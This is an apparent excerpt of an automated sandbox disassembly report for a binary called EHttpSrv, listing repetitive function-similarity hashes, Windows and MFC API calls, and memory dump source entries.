                                                                                                                Similarity
                                                                                                                • API ID: #6063MessageSend$#2311#310#3756#578swscanf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 858908244-0
                                                                                                                • Opcode ID: 1464e5cfa7a83aa8a59b78d47f766604f1306e9a887bda0a44e5ac2ff66e6f8e
                                                                                                                • Instruction ID: 69451ac66363ffd69de476115491b617f5135a9de66107f067028f297cf54f98
                                                                                                                • Opcode Fuzzy Hash: 1464e5cfa7a83aa8a59b78d47f766604f1306e9a887bda0a44e5ac2ff66e6f8e
                                                                                                                • Instruction Fuzzy Hash: 314103B16087419FC714DF50CC80B6B77E9FB88714F40CA2DF9559B291EB399905CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$#3395ClientMetricsRectSystemfreemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1711230558-0
                                                                                                                • Opcode ID: c09c4cddeffb2a4e774a2ad75fe4ebdcd482e17445a0f4d63acbd6b2082bbd6d
                                                                                                                • Instruction ID: 7c111e8234d5641f4b74ef2d2af4d4f695ebef2d36820c8c541985d8ee9576ad
                                                                                                                • Opcode Fuzzy Hash: c09c4cddeffb2a4e774a2ad75fe4ebdcd482e17445a0f4d63acbd6b2082bbd6d
                                                                                                                • Instruction Fuzzy Hash: 47315EB1604706AFD7208BA5CC85F1777E8BB88754F11C92CE9D9C7291DB38E905CB61
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostRect$#1894#2366#2648ClientParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 136377152-0
                                                                                                                • Opcode ID: f7cddc6b869b18365e28be2dbd63bb103cbc1edc7210e14762cfe86dab28edde
                                                                                                                • Instruction ID: 385c1e87878244af9c6bf314d0286646255dcfb790630a3338cf519b74c76bcb
                                                                                                                • Opcode Fuzzy Hash: f7cddc6b869b18365e28be2dbd63bb103cbc1edc7210e14762cfe86dab28edde
                                                                                                                • Instruction Fuzzy Hash: B621AA727006049BC714DBA8DC84EBBB3F8FB88615B108B5DFA95C7651DA35F800C7A0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2011#359#3828#3998#578#5832#607#6735memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 126714201-0
                                                                                                                • Opcode ID: 256313df5807d866f03f49126790f0c027ef40375f6b49a617e38de642894119
                                                                                                                • Instruction ID: c763532d55a962847b69b75e6bc18a6ddab311bd77bd401084034ad75326b9cc
                                                                                                                • Opcode Fuzzy Hash: 256313df5807d866f03f49126790f0c027ef40375f6b49a617e38de642894119
                                                                                                                • Instruction Fuzzy Hash: A23143712087809FD724DBA4C855BEAB7E4AF98714F008A1EF555876D0EB789904C753
                                                                                                                APIs
                                                                                                                • #4574.MFC80U ref: 2045F24E
                                                                                                                • GetClientRect.USER32(?,?), ref: 2045F25C
                                                                                                                • #2651.MFC80U(000004C3,0000000F), ref: 2045F28D
                                                                                                                  • Part of subcall function 2045D0A0: GetParent.USER32(?), ref: 2045D0B0
                                                                                                                  • Part of subcall function 2045D0A0: #2366.MFC80U(00000000), ref: 2045D0B7
                                                                                                                  • Part of subcall function 2045D0A0: #4109.MFC80U(00000000,02000000,00000000), ref: 2045D0D7
                                                                                                                  • Part of subcall function 2045D0A0: GetClientRect.USER32(?,?), ref: 2045D0F1
                                                                                                                  • Part of subcall function 2045D0A0: GetWindowRect.USER32(?,00000000), ref: 2045D116
                                                                                                                  • Part of subcall function 2045D0A0: #5609.MFC80U(00000000), ref: 2045D123
                                                                                                                  • Part of subcall function 2045D0A0: malloc.MSVCR80 ref: 2045D12A
                                                                                                                  • Part of subcall function 2045D0A0: #5713.MFC80U(?,00000000), ref: 2045D177
                                                                                                                • #2651.MFC80U(000004D7,00000008,000004C3,0000000F), ref: 2045F2A2
                                                                                                                • #2651.MFC80U(00000499,00000008,000004D7,00000008,000004C3,0000000F), ref: 2045F2B7
                                                                                                                • #2651.MFC80U(000004D7), ref: 2045F2D3
                                                                                                                • #2155.MFC80U(00000000,000004D7), ref: 2045F2E0
                                                                                                                • #2651.MFC80U(00000499,000004D7), ref: 2045F2EC
                                                                                                                • #2155.MFC80U(00000000,00000499,000004D7), ref: 2045F2F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651$Rect$#2155Client$#2366#4109#4574#5609#5713ParentWindowmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1533607108-0
                                                                                                                • Opcode ID: 75b32bee038ec3f055f89b3a77d0f563f2ce60f4c12f110e31d42f17823995c4
                                                                                                                • Instruction ID: 12caeb71d6cb5cb63b0c79dc7bf450e27fdfd275581a6ec987d697c725427b09
                                                                                                                • Opcode Fuzzy Hash: 75b32bee038ec3f055f89b3a77d0f563f2ce60f4c12f110e31d42f17823995c4
                                                                                                                • Instruction Fuzzy Hash: D511C3B03403066BD704ABF4C856BBEB7A5AFA0E08F40C62DB6449B6D0DE68AC058755
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(?,20457514), ref: 2042C253
                                                                                                                • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 2042C291
                                                                                                                • GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 2042C2A5
                                                                                                                • #2366.MFC80U(00000000), ref: 2042C2A8
                                                                                                                • #2648.MFC80U(00000000), ref: 2042C2B7
                                                                                                                • #1005.MFC80U(00000000,00000000,00000000,00000000,00000000), ref: 2042C2D1
                                                                                                                • GetNextDlgTabItem.USER32(?,?,00000000), ref: 2042C2E0
                                                                                                                • #2366.MFC80U(00000000), ref: 2042C2E3
                                                                                                                • SetForegroundWindow.USER32(?), ref: 2042C2F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2366ItemNext$#1005#2648#4574ForegroundMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 183709898-0
                                                                                                                • Opcode ID: 30d86843a7a0115f8584d825181697ca30c7dfa468d451f1a6c4215dc9c416e6
                                                                                                                • Instruction ID: 717947ed28c759a126b30f0293c07f5a9e78839d161f282296525fc96fe913fe
                                                                                                                • Opcode Fuzzy Hash: 30d86843a7a0115f8584d825181697ca30c7dfa468d451f1a6c4215dc9c416e6
                                                                                                                • Instruction Fuzzy Hash: 8D112231740B01BBD62457F4DC81FAAB368BB45A14F00C668FA08EB2C0DE69FD4183A0
                                                                                                                APIs
                                                                                                                • #310.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444851
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444862
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444873
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444884
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 20444895
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 204448A6
                                                                                                                • #310.MFC80U(?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 204448B7
                                                                                                                • EnterCriticalSection.KERNEL32(00003FC8,?,?,00000000,2047E5D1,000000FF,20441B81,00000000), ref: 204448CF
                                                                                                                • LeaveCriticalSection.KERNEL32(00003FC8), ref: 204448DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$CriticalSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 2018764849-0
                                                                                                                • Opcode ID: dc30752cbd3352a4a41d008ae2c0dfec2ecbb15ad48c5c87bc3b5eb03c551049
                                                                                                                • Instruction ID: 149e7ac79b37164727e2346f3cd882fd213499b13d4c724ad8dea1ca39136e5a
                                                                                                                • Opcode Fuzzy Hash: dc30752cbd3352a4a41d008ae2c0dfec2ecbb15ad48c5c87bc3b5eb03c551049
                                                                                                                • Instruction Fuzzy Hash: 5F214730008B81DFC311DF64CC88B96BFE4FB65759F108E2DF496826A1DB396648CB92
                                                                                                                APIs
                                                                                                                • GetTextMetricsW.GDI32(?,?), ref: 2043B8B1
                                                                                                                • GetTextExtentPoint32W.GDI32(?,2048B8C8,00000001,?), ref: 2043B8C4
                                                                                                                • memset.MSVCR80 ref: 2043B8D3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ExtentMetricsPoint32memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2649258116-2735817509
                                                                                                                • Opcode ID: f818c91ce8229f5eabd7a1dc3580614bf2c4515ec148b0c47a5bae0681ff08b1
                                                                                                                • Instruction ID: 04d7869c2b87461092ef02d3b1c4d5f8aff85504e6062eabee1153db2eead2da
                                                                                                                • Opcode Fuzzy Hash: f818c91ce8229f5eabd7a1dc3580614bf2c4515ec148b0c47a5bae0681ff08b1
                                                                                                                • Instruction Fuzzy Hash: E15148B65083419FC310EFA4C880B5BBBF5AFC9714F10D91DFA9993251D778A909CB92
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2045B386
                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 2045B3A8
                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 2045B3E8
                                                                                                                • #2860.MFC80U(-00000002), ref: 2045B3F1
                                                                                                                • memset.MSVCR80 ref: 2045B45B
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2045B4FE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2860#314#6751memset
                                                                                                                • String ID: H
                                                                                                                • API String ID: 1096045933-2852464175
                                                                                                                • Opcode ID: 46191001adbfb0f823e1850d3ff10f7cd6632487f737781d04927b7d4074ad65
                                                                                                                • Instruction ID: 8c6d3108348b86b4f4e31ab9c5c9604d9b4c750fb206cd4083dfeed3ef3df40c
                                                                                                                • Opcode Fuzzy Hash: 46191001adbfb0f823e1850d3ff10f7cd6632487f737781d04927b7d4074ad65
                                                                                                                • Instruction Fuzzy Hash: 905191B1A04608EFDB14CF94C881BEDBBB4FB58714F10826DE915AB391D779A905CBA0
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044F299
                                                                                                                  • Part of subcall function 20462A10: EnterCriticalSection.KERNEL32(?,FEEA6C22,?,?,?,?), ref: 20462A3F
                                                                                                                  • Part of subcall function 20462A10: #280.MFC80U(?,?,00000000,?,?), ref: 20462A55
                                                                                                                  • Part of subcall function 20462A10: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 20462AD0
                                                                                                                  • Part of subcall function 20462A10: #310.MFC80U(?,00000000,?,?), ref: 20462ADE
                                                                                                                  • Part of subcall function 20462A10: #310.MFC80U(?,00000000,?,?), ref: 20462AF0
                                                                                                                  • Part of subcall function 20462A10: #4026.MFC80U(000000B7,?,00000000,?,?), ref: 20462B04
                                                                                                                  • Part of subcall function 20462A10: #4026.MFC80U(000000B2,?,00000000,?,?), ref: 20462B13
                                                                                                                  • Part of subcall function 20462A10: MessageBoxW.USER32(00000000,?,?,00000010), ref: 20462B2A
                                                                                                                  • Part of subcall function 20462A10: #578.MFC80U(?,00000000,?,?), ref: 20462B39
                                                                                                                  • Part of subcall function 20462A10: #578.MFC80U(?,00000000,?,?), ref: 20462B4B
                                                                                                                • #310.MFC80U(?,?,00003630,00003EFC,-00003E6C), ref: 2044F3C2
                                                                                                                • #4026.MFC80U(00000077,?), ref: 2044F41C
                                                                                                                • #4026.MFC80U(00000076,?), ref: 2044F46A
                                                                                                                  • Part of subcall function 20412B10: #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                  • Part of subcall function 20412B10: #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BF3
                                                                                                                  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C00
                                                                                                                  • Part of subcall function 204677A0: EnterCriticalSection.KERNEL32(-00003A6C,?,?,?,2044F2EE,?,?,00000000,00000000), ref: 204677A9
                                                                                                                  • Part of subcall function 204677A0: LeaveCriticalSection.KERNEL32(-00003A6C,-00003E44,?,2044F2EE,?,?,00000000,00000000), ref: 204677C0
                                                                                                                • #1176.MFC80U(?), ref: 2044F531
                                                                                                                • #4026.MFC80U(00000078,?), ref: 2044F5AE
                                                                                                                • #578.MFC80U(?), ref: 2044F686
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044F6B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026#764$CriticalSection$#310#578$#1176EnterLeave$#265#280#314#6751Messagememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3887008047-0
                                                                                                                • Opcode ID: b2bfdf396d9384adda82f74b60be1817eaeb1267e1407364b462e9108ef9b5fd
                                                                                                                • Instruction ID: f302d05e3825bd07ca04ebf36d67b8bda39176010dbeb0f07acd231b2700a8da
                                                                                                                • Opcode Fuzzy Hash: b2bfdf396d9384adda82f74b60be1817eaeb1267e1407364b462e9108ef9b5fd
                                                                                                                • Instruction Fuzzy Hash: D3D1DF70608305AFD314DF64C880B6BB7A1EF94B08F51CA1CF95587392DB39E906CB92
                                                                                                                APIs
                                                                                                                • #280.MFC80U(?,FEEA6C22,00000000,2047AEF9,000000FF,2042F9F3,00000000,?), ref: 2042FB2E
                                                                                                                • #899.MFC80U( ), ref: 2042FB45
                                                                                                                • #6063.MFC80U(?), ref: 2042FB52
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 2042FB5F
                                                                                                                • #578.MFC80U ref: 2042FB71
                                                                                                                • #1176.MFC80U(FEEA6C22,00000000,2047AEF9,000000FF,2042F9F3,00000000,?), ref: 2042FB89
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176#280#578#6063#899InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3088243248-399585960
                                                                                                                • Opcode ID: 4d49673be8d75949b1e1a0b5e3412ca3ff7cb27203972ef5d35702515fcf7e24
                                                                                                                • Instruction ID: b0faaa034b84c1fa1ddc5dff7bf1fca6dd93627ac5db641cbeda2d35d3c9bece
                                                                                                                • Opcode Fuzzy Hash: 4d49673be8d75949b1e1a0b5e3412ca3ff7cb27203972ef5d35702515fcf7e24
                                                                                                                • Instruction Fuzzy Hash: 88111C75104A419FC710DFA4CC94B5AB7E4FB88B14F50CA2DF556836A0DB39E905CB52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschrwcsncpy_s$wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3357641305-0
                                                                                                                • Opcode ID: c59eb458cf4fd7a1e4c4e0c0152fe135a5944002f18257d60f5f10f5d1fa1ffb
                                                                                                                • Instruction ID: 347d500640f9eb3dd12fb6016f3ea24eee86d6d7e7c2936d64b2d4fc90e8bfb9
                                                                                                                • Opcode Fuzzy Hash: c59eb458cf4fd7a1e4c4e0c0152fe135a5944002f18257d60f5f10f5d1fa1ffb
                                                                                                                • Instruction Fuzzy Hash: 9C81EFB25043068FC3289FA8CD45A9B77E6EFC8704F458A2CE985D7345EA78EA04C7D1
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,?,?,?,2047F1AF,000000FF,2043F70A,FEEA6C22,?,?,?,00000000,2047A185), ref: 2043F40F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: cb5708c9c9b3ff582acc7c17eab28571bd9283a47c901236fd4fa4bc37ebb7c4
                                                                                                                • Instruction ID: 3efddf22e9fe88da37ea4736d75f760c28e1615ed373dc71c1ed3eb50ed88554
                                                                                                                • Opcode Fuzzy Hash: cb5708c9c9b3ff582acc7c17eab28571bd9283a47c901236fd4fa4bc37ebb7c4
                                                                                                                • Instruction Fuzzy Hash: 4981CF716007068FC324CFA9CCC0B6A73E1EF98618F24CA2DE56687751DB3DE90A8B50
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,?,?,?,2047F1AF,000000FF,2045043A,FEEA6C22,?,?,?,00000000,2047A185), ref: 2043FF6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
